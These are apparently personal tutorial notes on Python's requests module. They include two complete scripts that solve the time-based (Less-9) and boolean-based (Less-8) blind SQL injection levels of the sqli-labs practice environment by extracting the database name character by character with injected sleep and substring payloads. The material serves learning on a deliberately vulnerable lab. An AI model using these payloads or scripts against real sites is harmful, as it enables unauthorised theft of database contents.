Python notes: solving blind and time-based SQL injection
The requests module
To do this in Python you need the requests module. I use PyCharm, where it was already available to me; if it is missing, install it with
pip install requests
Once pip finishes, these are the module's main functions:
| GET request | POST request |
|---|---|
| `res = requests.get(url, params=data)` | `res = requests.post(url, data=data)` |
Here `res` is short for response.
Both calls accept many keyword arguments, among them:
1. url
2. headers
3. params (GET query string)
4. data (POST body)
5. files
6. cookies
and so on, including `timeout`, which matters for time-based injection because it decides how long a request may run before it counts as delayed.
- res.text: response body as text
- res.status_code: HTTP status code (e.g. 200)
- res.encoding: page encoding
- res.content: response body as raw bytes
- res.headers: response headers
- res.cookies: cookies set by the response
In short, requests is a powerful module: custom headers, GET parameters, POST bodies, file uploads, redirects, session tracking, cookie handling and more.
To get familiar with the module, the two scripts below use it to solve the time-based (Less-9) and boolean-based (Less-8) blind injection levels of sqli-labs. They stop at dumping the current database name. The code follows (originally posted as screenshots):
Solving time-based injection
```python
import requests
import string

url = "http://43.247.91.228:84/Less-9/"


def iftimeout(url):
    """Return True if the request took longer than 3 s, i.e. sleep(5) fired.
    Only a Timeout counts as 'true'; a connection error is a real failure
    and is allowed to propagate instead of being mistaken for a delay."""
    try:
        requests.get(url, timeout=3)
        return False
    except requests.exceptions.Timeout:
        return True


# Dump the length of the database name. In Less-9 the page looks the same for
# true and false conditions, so the only signal is whether the response was delayed.
dbnamelen = 0
while True:
    dbnamelen += 1
    dbnamelen_url = url + "?id=1'+and+if(length(database())=" + str(dbnamelen) + ",sleep(5),1)--+"
    print(dbnamelen_url)
    if iftimeout(dbnamelen_url):
        print("db name length:", dbnamelen)
        break
    if dbnamelen >= 64:
        raise SystemExit("no length matched: check the target and the payload")
# Length found: 8

# Dump the database name one character at a time. Lowercase letters are enough
# for sqli-labs; widen the charset (digits, '_', uppercase) for other targets.
dbname = ""
for i in range(1, dbnamelen + 1):
    for j in string.ascii_lowercase:
        dbname_url = url + "?id=1'+and+if(substr(database()," + str(i) + ",1)='" + j + "',sleep(5),1)--+"
        print(dbname_url)
        if iftimeout(dbname_url):
            dbname += j
            print("db name:", dbname)
            break
# Database name dumped
```
(Screenshot: the database name dumped by the script.)
Solving boolean-based blind injection
```python
import requests
import string

url = "http://43.247.91.228:84/Less-8/"

# Baseline: length of the page for a plain id=1, i.e. for a true condition.
htmlLen = len(requests.get(url=url + "?id=1").text)
print("the len of HTML:" + str(htmlLen))

# Dump the length of the database name. In Less-8 the page only matches the
# baseline when the injected condition is true.
dbNameLen = 0
while True:
    dbNameLen_url = url + "?id=1'+and+length(database())=" + str(dbNameLen) + "--+"
    print(dbNameLen_url)
    if len(requests.get(dbNameLen_url).text) == htmlLen:
        print("the length of dbName:" + str(dbNameLen))
        break
    if dbNameLen == 30:
        # Without this exit the loop would run forever on a bad payload.
        raise SystemExit("Error: no length matched up to 30")
    dbNameLen += 1

# Dump the database name one character at a time (lowercase letters only).
dbName = ""
for i in range(1, dbNameLen + 1):
    for j in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+substr(database()," + str(i) + ",1)='" + j + "'--+"
        if len(requests.get(dbName_url).text) == htmlLen:
            dbName += j
            print(dbName)
            break
```
The database name this produces matches the one in the screenshot above.
Summary
Python is a great tool and well worth learning properly!!!
These are my notes from a tutorial video; they are very basic, so please go easy on me.